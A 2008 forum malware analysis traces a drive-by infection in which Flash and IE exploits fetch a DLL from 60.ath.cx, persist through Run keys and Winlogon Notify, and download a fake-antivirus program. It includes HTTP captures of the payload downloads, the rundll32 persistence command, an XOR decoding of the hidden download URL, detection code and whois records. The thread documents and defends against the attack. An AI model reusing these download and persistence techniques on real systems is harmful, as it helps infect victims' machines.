At 30.ath.cx we stumble on some obfuscated code. Besides the usual Internet Explorer MDAC and Microsoft XML Core Services exploits, we notice a part dedicated to Flash. The installed Flash version is tested and, according to the result, either i47.swf or i115.swf will be used.
IPB Image
______________________________

What does i47.swf or i115.swf do ?

Upon "execution / analysis" they try to access the Internet, as seen below, in order to download a file from 60.ath.cx which will be saved as c:\boot.bak
IPB Image
CODE
GET /up.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:11:08 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Cache-Control: private
Content-Transfer-Encoding: binary
Accept-Ranges: bytes
Content-Length: 33280
Content-Disposition: inline; filename=set.css
Connection: close

Content-Type: application/octet-stream
Once saved, the file will be executed by rundll32.exe because boot.bak is a DLL:
rundll32 c:\boot.bak,DllCanUnloadNow
IPB Image
boot.bak reveals some interesting stuff as seen in the packet stream. We can see some loading points and additional files to download.
IPB Image
______________________________

Visible loading points using HijackThis.
O4 - HKLM\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKCU\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKUS\S-1-5-18\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow (User 'Default user')
O20 - Winlogon Notify: SysBackup - c:/boot.bak
______________________________

c:\boot.bak

Once loaded by rundll32.exe, list.php will be requested from the server. This file will be saved as C:\Documents and Settings\[username]\Cookies\site.yahoo.txt
It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent a URL ... but I'm unable to confirm this right now.
CODE
GET /list.php HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:03 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 61
Connection: close

Content-Type: text/html
The next step is to request 554.exe from 60.ath.cx which will be saved as C:\Documents and Settings\[username]\Cookies\0.exe
CODE
GET /files/554.exe HTTP/1.1
Accept: */*
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: 60.ath.cx
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sat, 26 Jul 2008 17:12:12 GMT
Server: Apache/2.2.8 (Unix) PHP/5.2.6
Last-Modified: Sat, 26 Jul 2008 14:40:29 GMT
ETag: "13a4459-1ae00-452ee4586d140"
Accept-Ranges: bytes
Content-Length: 110080
Connection: close

Content-Type: application/x-msdownload
0.exe will be executed by c:\boot.bak
IPB Image
______________________________

After reboot.

Once the computer has rebooted, c:\boot.bak is loaded under the winlogon process and then launches 0.exe present on our HDD.
IPB Image
Files will be updated as "rundll32.exe" downloads list.php, followed by the executable, from the Internet again.
If I'm not mistaken, this method *could* allow loading whatever executable on boot without changing anything in the registry once boot.bak is in place. Putting the files into the Cookies folder is a nifty trick too, as they will be considered "harmless" by the average user.
______________________________

SWF Files.

When it comes to ActionScript code, i47.swf and i115.swf are identical. The addFrameScript() method is used to dynamically add a frame script.
IPB Image
i47.swf has 4 tags while i115.swf only has 3 tags.
IPB Image IPB Image
The files are very difficult to analyse but the shellcode *might* again be hidden in the image as seen in the Kaspersky write-up.

VirusTotal results


Filename: ie_update.exe

This is the file from the Internet Explorer MDAC / Microsoft XML Core Services exploit. It performs the same actions as the Flash files.

File size: 1024 bytes
MD5...: 4e6a301eb75586afdb4f2465aaf90fcb
SHA1..: 3f72fc5c1650b7ede99df39b9ac915f2197b0229
PEiD..: -
QUOTE
File ie_update.exe received on 07.26.2008 16:47:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.25 -
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Win32.KME.Based.1.Gen
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.25 -
F-Secure 7.60.13501.0 2008.07.26 W32/Downloader
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 W32/Downloader
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 suspected of Win32.Trojan.Downloader (http://...)
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -
______________________________

Filename: i47.swf

File size: 728 bytes
MD5...: 8c802fa1e22eb006def9b1df88f951c5
SHA1..: 751388f93da81188753e88050a36b9dd2066152d
SHA256: ea7e7f288f9d0125c5cb911ba4ea8d8a45fbe442fc864b71ad5568f9bc7c9481
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i47.swf received on 07.26.2008 20:14:35 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 Hack.Exploit.Swf.a
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen
______________________________

Filename: i115.swf

File size: 754 bytes
MD5...: c7c21d95ffb6aaa3cc18a546803786fc
SHA1..: 5105810716e3d1816e02c81ca9310df01298b6c4
SHA256: 798225306d0c9c504c74c7ed57315220b97bd78bccab84890503d495c52763b7
PEiD..: -
packers (Kaspersky): Swf2Swc
QUOTE
File i115.swf received on 07.26.2008 20:14:53 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 Win-Trojan/Exploit-SWF.Gen
AntiVir 7.8.1.12 2008.07.25 EXP/Flash.Gen
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 SWF:CVE-2007-0071
AVG 8.0.0.130 2008.07.25 -
BitDefender 7.2 2008.07.26 Exploit.SWF.Gen
CAT-QuickHeal 9.50 2008.07.25 SWF.Exploit
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 SWF:CVE-2007-0071
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Exploit:Win32/APSB08-11.gen!A
NOD32v2 3300 2008.07.25 SWF/Exploit.CVE-2007-0071
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 Exp/SWFScene-A
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Bloodhound.Exploit.193
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Exploit.Flash.Gen
______________________________

Filename: boot.bak

File size: 110080 bytes
MD5...: b826aecb029962edbd771d149a920b21
SHA1..: a5ac9997a59ec1d227c0d708f9aacd8b5d33ffb4
SHA256: bf026894ea43cbcad39f554476dc1847cdec0cdb76e9161a1095c56a0a8c689f
PEiD..: -
QUOTE
File boot.bak received on 07.27.2008 00:59:17
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.26 -
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.26 -
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 -
ClamAV 0.93.1 2008.07.27 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 -
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.27 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.27 -
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.27 -
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 -
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 -
______________________________

Filename: 0.exe

File size: 33280 bytes
MD5...: 47d6acb7d79d7790da02b9fbd809eacb
SHA1..: 638f76a93cb6fc35c9a33e4a8b6d2971fd381411
SHA256: 7945086ac43c55423c44de4328ac41cef0e0143d597c98873d0f1f3941212ba6
PEiD..: -
QUOTE
File 0.exe received on 07.26.2008 20:15:47 (CET)
AhnLab-V3 2008.7.26.0 2008.07.25 -
AntiVir 7.8.1.12 2008.07.25 HEUR/Crypted
Authentium 5.1.0.4 2008.07.26 -
Avast 4.8.1195.0 2008.07.26 -
AVG 8.0.0.130 2008.07.25 Downloader.FraudLoad.A
BitDefender 7.2 2008.07.26 -
CAT-QuickHeal 9.50 2008.07.25 (Suspicious) - DNAScan
ClamAV 0.93.1 2008.07.26 -
DrWeb 4.44.0.09170 2008.07.26 -
eSafe 7.0.17.0 2008.07.24 Suspicious File
eTrust-Vet 31.6.5983 2008.07.26 -
Ewido 4.0 2008.07.26 -
F-Prot 4.4.4.56 2008.07.26 -
F-Secure 7.60.13501.0 2008.07.26 -
Fortinet 3.14.0.0 2008.07.26 -
GData 2.0.7306.1023 2008.07.26 -
Ikarus T3.1.1.34.0 2008.07.26 -
Kaspersky 7.0.0.125 2008.07.26 -
McAfee 5347 2008.07.25 -
Microsoft 1.3704 2008.07.26 Worm:Win32/Nuwar.KE
NOD32v2 3300 2008.07.25 -
Norman 5.80.02 2008.07.25 -
Panda 9.0.0.4 2008.07.26 -
PCTools 4.4.2.0 2008.07.26 -
Prevx1 V2 2008.07.26 Malicious Software
Rising 20.54.52.00 2008.07.26 -
Sophos 4.31.0 2008.07.26 -
Sunbelt 3.1.1536.1 2008.07.25 -
Symantec 10 2008.07.26 Packed.Generic.174
TheHacker 6.2.96.389 2008.07.25 -
TrendMicro 8.700.0.1004 2008.07.26 -
VBA32 3.12.8.1 2008.07.26 -
ViRobot 2008.7.26.1311 2008.07.26 -
VirusBuster 4.5.11.0 2008.07.26 -
Webwasher-Gateway 6.6.2 2008.07.26 Heuristic.Crypted


Update on site.yahoo.txt
QUOTE
It does contain a chain of hex characters which I deliberately left out of the stream. I suspect this *might* represent an URL ... but I'm unable to confirm this right now.

Thanks to MAD I can now confirm it does contain the URL of the file to download. Such a technique could make you download a different file tomorrow and run it on your computer without having to modify anything related to startup settings, since the file is loaded by boot.bak.

Inside the stream capture of boot.bak (cf. http://www.bluetack.co.uk/Kimberly/Logs/swf232.jpg) we notice a string called "sobaka-barabaka". Further analysis of boot.bak reveals the following portion of code:
CODE
10002C98   push    offset "sobaka-barabaka"
10002C9D   lea     eax, [ebp+var_3FC]
10002CA3   push    eax
10002CA4   call    dec0de
Note: the above is only a small snippet and does not represent the complete decoding procedure (UrlDecoded).

We can call sobaka-barabaka a "key" to decode the string inside list.php aka site.yahoo.txt. The following reference table will come in handy for people who are not familiar with conversions.
CODE
char -> decimal -> hex -> octal -> binary
s -> 115 -> 0x73 -> 163 -> 1110011
o -> 111 -> 0x6F -> 157 -> 1101111
b -> 98 -> 0x62 -> 142 -> 1100010
a -> 97 -> 0x61 -> 141 -> 1100001
k -> 107 -> 0x6B -> 153 -> 1101011
a -> 97 -> 0x61 -> 141 -> 1100001
...
...
Got the principle of conversion? Let's move on to decoding then. Our string is
21B1B1611514E0254515C00160945020B40040807045E4D5447554C041304
We leave aside the 2 in front of the chain and keep the rest.
1B1B1611514E0254515C00160945020B40040807045E4D5447554C041304
Being a hex representation, the chain will be decoded 2 characters at a time using the "key".
key: s -> 115 -> 0x73 -> 163 -> 1110011
part: 1B
decode: 0x73^0x1B=0x68

0x68 in hex represents 104 in ASCII, which represents the letter h
To decode the string, a loop is needed until all hex chars are processed. Below is the illustration / result of the decoding procedure.
CODE
0x73^0x1B:0x68 -> h
0x6F^0x1B:0x74 -> t
0x62^0x16:0x74 -> t
0x61^0x11:0x70 -> p
0x6B^0x51:0x3A -> :
0x61^0x4E:0x2F -> /
0x2D^0x02:0x2F -> /
0x62^0x54:0x36 -> 6
0x61^0x51:0x30 -> 0
0x72^0x5C:0x2E -> .
0x61^0x00:0x61 -> a
0x62^0x16:0x74 -> t
0x61^0x09:0x68 -> h
0x6B^0x45:0x2E -> .
0x61^0x02:0x63 -> c
0x73^0x0B:0x78 -> x
0x6F^0x40:0x2F -> /
0x62^0x04:0x66 -> f
0x61^0x08:0x69 -> i
0x6B^0x07:0x6C -> l
0x61^0x04:0x65 -> e
0x2D^0x5E:0x73 -> s
0x62^0x4D:0x2F -> /
0x61^0x54:0x35 -> 5
0x72^0x47:0x35 -> 5
0x61^0x55:0x34 -> 4
0x62^0x4C:0x2E -> .
0x61^0x04:0x65 -> e
0x6B^0x13:0x78 -> x
0x61^0x04:0x65 -> e
Which gives us http://60.ath.cx/files/554.exe
This file will be saved as C:\Documents and Settings\[username]\Cookies\0.exe

Special thanks fly out to MAD for confirming my initial thought of this being a link.
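The XOR decoding walked through above, as an added example (not code from the original post): a Python decoder using the key sobaka-barabaka that reproduces the per-byte trace and, going one step beyond the post, recovers the leading key bytes from the known plaintext prefix "http://". Skipping exactly one leading marker character and the printable-ASCII sanity check are this example's own assumptions.

```python
# Added example, not from the original post: repeating-key XOR decoder for the
# list.php / site.yahoo.txt chain described above.
# Assumptions: the leading "2" is a one-character marker that is skipped; the
# remaining hex is XORed byte by byte with the cycling key "sobaka-barabaka".

KEY = b"sobaka-barabaka"  # string pushed right before the call to dec0de in boot.bak

# The 61-character body returned by /list.php (Content-Length: 61 in the capture).
LIST_PHP_BODY = "21B1B1611514E0254515C00160945020B40040807045E4D5447554C041304"


def xor_decode(hex_chain: str, key: bytes = KEY, skip: int = 1) -> bytes:
    """Drop `skip` leading characters, then XOR each hex byte with the cycling key."""
    payload = hex_chain[skip:]
    if len(payload) % 2:
        raise ValueError("hex chain has odd length after removing the marker")
    data = bytes.fromhex(payload)
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_trace(hex_chain: str, key: bytes = KEY, skip: int = 1) -> list:
    """Per-byte trace in the same layout as the table above, e.g. '0x73^0x1B:0x68 -> h'."""
    data = bytes.fromhex(hex_chain[skip:])
    rows = []
    for i, b in enumerate(data):
        k = key[i % len(key)]
        out = k ^ b
        rows.append(f"0x{k:02X}^0x{b:02X}:0x{out:02X} -> {chr(out)}")
    return rows


def decode_url(hex_chain: str) -> str:
    """Decode and return the plaintext; refuse anything that is not printable ASCII
    (a wrong key or wrong marker length shows up here as garbage)."""
    plain = xor_decode(hex_chain)
    if not all(0x20 <= c < 0x7F for c in plain):
        raise ValueError("decoded bytes are not printable ASCII: wrong key or marker?")
    return plain.decode("ascii")


def key_from_known_plaintext(hex_chain: str, known: bytes, skip: int = 1) -> bytes:
    """Known-plaintext step: with the plaintext start known (every downloader URL
    begins with 'http://'), XOR gives back the first len(known) key bytes."""
    data = bytes.fromhex(hex_chain[skip:])[: len(known)]
    return bytes(c ^ p for c, p in zip(data, known))


if __name__ == "__main__":
    for row in decode_trace(LIST_PHP_BODY):
        print(row)
    print(decode_url(LIST_PHP_BODY))  # http://60.ath.cx/files/554.exe
    print(key_from_known_plaintext(LIST_PHP_BODY, b"http://"))  # b'sobaka-'
```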
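The boot.bak loading points listed earlier in this post, as an added defender-side example (not code from the original post): a small Python checker for HijackThis-style O4 and O20 lines that flags rundll32 autoruns pointing at a non-.dll file in the drive root and Winlogon Notify modules outside system32. The heuristics, the assumed %SystemRoot% path and the two benign sample lines are this example's own.

```python
# Added example, not from the original post: heuristics over HijackThis O4/O20 lines
# for the persistence pattern shown above (rundll32 c:\boot.bak,DllCanUnloadNow and
# a Winlogon Notify entry pointing at c:/boot.bak).
import re

# Constructed excerpt: the three boot.bak lines are taken from the post, the two
# benign lines (ctfmon.exe, crypt32chain) are added here for contrast.
HJT_LOG = r"""
O4 - HKLM\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKCU\..\Run: [System Restore Routine] rundll32 c:\boot.bak,DllCanUnloadNow
O4 - HKLM\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O20 - Winlogon Notify: SysBackup - c:/boot.bak
O20 - Winlogon Notify: crypt32chain - crypt32.dll
""".strip()

O4_RE = re.compile(r"^O4 - (?P<hive>\S+): \[(?P<name>[^\]]*)\] (?P<cmd>.+)$")
O20_RE = re.compile(r"^O20 - Winlogon Notify: (?P<name>\S+) - (?P<dll>.+)$")
# rundll32 [path\]module,export   (module may be quoted)
RUNDLL_RE = re.compile(r'^rundll32(?:\.exe)?\s+"?(?P<module>[^,"]+)"?\s*,\s*(?P<export>\S+)', re.I)
SYSTEM32 = "c:\\windows\\system32\\"  # assumed %SystemRoot%\system32 for this example


def assess_o4(cmd: str) -> list:
    """Reasons an O4 Run entry looks like the boot.bak pattern; empty list if none."""
    reasons = []
    m = RUNDLL_RE.match(cmd.strip())
    if not m:
        return reasons  # only rundll32-based entries are assessed here
    module = m.group("module").strip().lower()
    export = m.group("export")
    if not module.endswith(".dll"):
        reasons.append(f"rundll32 loads a module without .dll extension: {module}")
    if re.match(r"^[a-z]:[\\/][^\\/]+$", module):
        reasons.append("module sits directly in the drive root")
    if export.lower() == "dllcanunloadnow":
        reasons.append("export DllCanUnloadNow is a COM housekeeping entry point, odd as a Run target")
    return reasons


def assess_o20(dll: str) -> list:
    """Reasons an O20 Winlogon Notify entry looks suspicious; empty list if none."""
    reasons = []
    p = dll.strip().lower().replace("/", "\\")
    if "\\" in p and not p.startswith(SYSTEM32):
        reasons.append(f"Winlogon Notify DLL outside system32: {dll}")
    if not p.endswith(".dll"):
        reasons.append("Winlogon Notify module without .dll extension")
    return reasons


def scan_hjt(log: str) -> list:
    """Return (line, reason) pairs for every flagged O4/O20 line in the log."""
    findings = []
    for line in log.splitlines():
        m = O4_RE.match(line)
        if m:
            findings.extend((line, r) for r in assess_o4(m.group("cmd")))
            continue
        m = O20_RE.match(line)
        if m:
            findings.extend((line, r) for r in assess_o20(m.group("dll")))
    return findings


if __name__ == "__main__":
    for line, reason in scan_hjt(HJT_LOG):
        print(f"{reason}\n    {line}")
```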
Kimberly

ie_update.exe & i47.swf & i115.swf - A small demonstration


ie_update.exe, i47.swf and i115.swf all perform the same task: download 60.ath.cx/up.php, save the file as c:\boot.bak and run the file.

Since it's extremely difficult to work with the SWF files, I chose ie_update.exe instead in order to show you the "embedded" link and the actions taken.

Below we see the use of urlmon.URLDownloadToFileA. This function will be used to download our file and save it as c:\boot.bak.
In the hex dump, we already notice the URL
IPB Image
Let's follow the CALL EAX a bit closer. The screenshot below is "inside" urlmon.dll. We clearly see our two actors, 60.ath.cx/up.php and c:\boot.bak
IPB Image
Once our file is downloaded, kernel32.WinExec is called. Once past that call we get the prompt from ProcessGuard that ie_update.exe wants to start c:\boot.bak using rundll32.exe (boot.bak being a DLL)
IPB Image
The same actions are performed with i47.swf & i115.swf.
Kimberly

Domains from 0.exe


Today I had a closer look at 0.exe, the file downloaded by c:\boot.bak. 0.exe contains a couple of interesting domains coded into it.
  • www.winifixer.com
  • avxp-08.com
  • youpornztube.com
winifixer.com

Website Title: WiniFixer
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-01-29
Expires: 2009-01-29
Updated: 2008-07-27
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: WINIFIXER.COM

Registrant:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Creation Date: 29-Jan-2008
Expiration Date: 29-Jan-2009

Domain servers in listed order:
No NameServers Defined.

Administrative Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Technical Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Billing Contact:
OOO AJSBIRI
Mishakov Viktor Ivanovich ()
Tihvinskaya, 20
Moscow
Moskovskaya oblast,127055
RU
Tel. +1.2107673441

Websites.
  1. Winifixer.com
  2. Youpornztube.com
______________________________

youpornztube.com

Website Title: None given.
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-03-03
Expires: 2009-03-03
Updated: 2008-07-27
Name Server: NS1.YOUPORNZTUBE.COM (has 1 domains)
Name Server: NS2.YOUPORNZTUBE.COM
Name Server: NS4.YOUPORNZTUBE.COM
Name Server: NS5.YOUPORNZTUBE.COM
Whois Server: whois.estdomains.com

Server Type: Apache
IP Address: 216.195.41.11
IP Location - China - Clivland Brian

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: YOUPORNZTUBE.COM

Registrant:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Creation Date: 03-Mar-2008
Expiration Date: 03-Mar-2009

Domain servers in listed order:
ns5.youpornztube.com
ns4.youpornztube.com
ns2.youpornztube.com
ns1.youpornztube.com

Administrative Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Technical Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123

Billing Contact:
Confidential District Limited
Alex James ()
Suite 2, Portland House, Glacis Road
Suite 2
Not Applicable,gi
GI
Tel. +414.45866123
______________________________

avxp-08.com

Website Title: Antivirus XP 2008
ICANN Registrar: ESTDOMAINS, INC.
Created: 2008-07-24
Expires: 2009-07-24
Updated: 2008-07-27
Name Server: NS1.AVXP-08.COM (has 1 domains)
Name Server: NS2.AVXP-08.COM
Name Server: NS4.AVXP-08.COM
Name Server: NS5.AVXP-08.COM
Whois Server: whois.estdomains.com

IP Address: 85.255.118.171
IP Location - Ukraine - Ukrtelegroup Ltd

Whois Record
Registration Service Provided By: ESTDOMAINS INC
Contact: +1.3027224217
Website: .www.estdomains.com

Domain Name: AVXP-08.COM

Registrant:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Creation Date: 24-Jul-2008
Expiration Date: 24-Jul-2009

Domain servers in listed order:
ns5.avxp-08.com
ns4.avxp-08.com
ns2.avxp-08.com
ns1.avxp-08.com

Administrative Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Technical Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Billing Contact:
eccos inc
krab ()
ny 37str
krabvill
Adygeja - Respublika,1111
RU
Tel. +1.324234234

Websites.
  1. Avxp-08.com
  2. I-kerberos.com
  3. Tobesoftware.com
______________________________

No NS servers are given for winifixer.com. On robtex, just before the page refreshes, we see it had 85.255.117.163 as IP and shared that same IP with youpornztube.com, avxp-08.com, tobesoftware.com and malwareprotector2008.com
IPB Image
Concerning youpornztube.com ... from Robtex
youpornztube.com is a domain controlled by five nameservers at youpornztube.com themselves. There are two duplicate ipnumbers. All of them are on the same IP network. Incoming mail for youpornztube.com is handled by one mailserver which is also at youpornztube.com. youpornztube.com has one IP record. ns2.avxp08.com, tobesoftware.com, ns2.tobesoftware.com and ns2.malwareprotector2008.com point to the same IP. avxp08.com, tobesoftware.com and malwareprotector2008.com use this as a nameserver. antivirxp08.com shares nameservers with this domain. avxp08.com, avxp2008.com, antivirxp08.com, tobesoftware.com, bakasoftware.net and at least six other hosts share mailservers with this domain. ns4.youpornztube.com, ns3.youpornztube.com, ns6.youpornztube.com, www.youpornztube.com, ns2.youpornztube.com and at least five other hosts are subdomains of this hostname.
85.255.117.163 is listed as being the current IP of youpornztube.com.

A quick check shows that they are moving domains around though. Currently resolving as ...

78.159.96.16 - tobesoftware.com
78.159.96.16 - advancedxpfixer.com
78.159.96.16 - antivirxp08.com

78.159.96.17 - antivirusprofessional2008.com
78.159.96.17 - avxp08.com
78.159.96.17 - avxp2008.com
78.159.96.17 - avxp-08.com

85.255.114.170 - antivirusxp-2008.com

85.255.118.171 - malwareprotector2008.com
85.255.118.171 - i-kerberos.com

194.110.162.114 - 216.195.41.11 - 216.240.139.169 - antivirusxp2008.com

211.95.79.242 - antivirusxp08.com

216.255.189.155 - bakasoftware.net
Kimberly

gnida.swf ... some surprising results


gnida.swf, newbieadguide.com & co: are they still used or dead? Only one way to figure out ... I was kinda surprised when I saw the link newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424 show up in search with a date / time stamp of 2008/07/17 00:54.
IPB Image
Let's narrow down a lil' bit.
IPB Image
Hmm ... some other links point their nose ... lil' peek on them also by isolating some stuff.
IPB Image
In our basket we now have
newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424
www.estandi.yoyo.pl/Aolmail.html
gogele.com
bull.s11.x-beat.com/src/bull124569.gif
and more recently newbieadguide.com replaced by
chocolatgirl.50webs.com/description/lame-enc.html

Ready for a ride?


newbieadguide.com/swf/gnida.swf?campaign=mortmainon&u23423424

No live redirect right now, at least not for me. It's setting a cookie and not showing stats so the campaign might still be "in use".
______________________________

estandi.yoyo.pl/Aolmail.html

Interesting case I must say; as it took me 2 minutes to figure out how the hell I suddenly ended up at scanning-computer-online.com. I didn't even have the chance to see estandi.yoyo.pl/Aolmail.html loading ...
IPB Image
IPB Image
IPB Image
On estandi.yoyo.pl/Aolmail.html we find a reference to a.js
IPB Image
